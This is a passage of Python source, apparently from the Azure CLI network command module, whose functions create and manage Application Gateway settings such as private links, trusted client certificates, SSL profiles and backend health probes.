rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
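# Illustrative invocation of the command implemented above (values are placeholders):
#   az network application-gateway create -g MyResourceGroup -n MyAppGateway \
#       --sku Standard_v2 --capacity 2 --public-ip-address MyPublicIp --vnet-name MyVnet
# The function assembles an ARM template (the gateway plus optional public IP and vnet
# resources) and submits it as a single incremental deployment.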
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
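    # If the gateway has no autoscale configuration yet, the attribute assignments below
    # raise AttributeError and a fresh configuration dict is created in the except branch.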
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
ssl_profile_id=None, firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
if cmd.supported_api_version(min_api='2020-06-01'):
new_listener.ssl_profile = SubResource(id=ssl_profile_id) if ssl_profile_id else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, ssl_profile_id=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if cmd.supported_api_version(min_api='2020-06-01'):
if ssl_profile_id is not None:
instance.ssl_profile = SubResource(id=ssl_profile_id)
if host_names is not None:
instance.host_names = host_names or None
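    # SNI only makes sense for an HTTPS listener with an explicit host name, so the flag
    # is recomputed from the (possibly updated) values.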
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_indentity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_indentity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
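# Adding a private link to an application gateway below proceeds in three steps: validate
# that the target frontend IP exists and is not already linked, prepare a dedicated subnet
# (reusing an existing one when a full resource ID is given), then append the private link
# configuration and point the frontend IP at it.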
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
            raise CLIError('Frontend IP already references an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
            raise CLIError('Private Link name already exists')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
            raise CLIError('Subnet name already exists')
if subnet.address_prefix == private_link_subnet_prefix:
            raise CLIError('Subnet prefix is already in use')
if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
            raise CLIError('Subnet prefix is already in use')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
    # the subnet left behind in the vnet has to be deleted manually
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
cert.data = client_cert_data
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
instance = cert
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return instance
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
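    # If any on-demand probe argument was supplied (i.e. the set below contains something
    # other than None) and the API version allows it, run an on-demand backend health probe;
    # otherwise fall back to the regular backend health call.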
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
if policy_name is not None:
instance.ssl_policy.policy_name = policy_name
if policy_type is not None:
instance.ssl_policy.policy_type = policy_type
if min_protocol_version is not None:
instance.ssl_policy.min_protocol_version = min_protocol_version
if cipher_suites is not None:
instance.ssl_policy.cipher_suites = cipher_suites
if disabled_ssl_protocols is not None:
instance.ssl_policy.disabled_ssl_protocols = disabled_ssl_protocols
if trusted_client_certificates is not None:
SubResource = cmd.get_models('SubResource')
instance.trusted_client_certificates = [SubResource(id=item) for item in trusted_client_certificates]
if client_auth_configuration is not None:
ApplicationGatewayClientAuthConfiguration = cmd.get_models('ApplicationGatewayClientAuthConfiguration')
instance.client_auth_configuration = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=(client_auth_configuration == 'True')
)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return instance
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
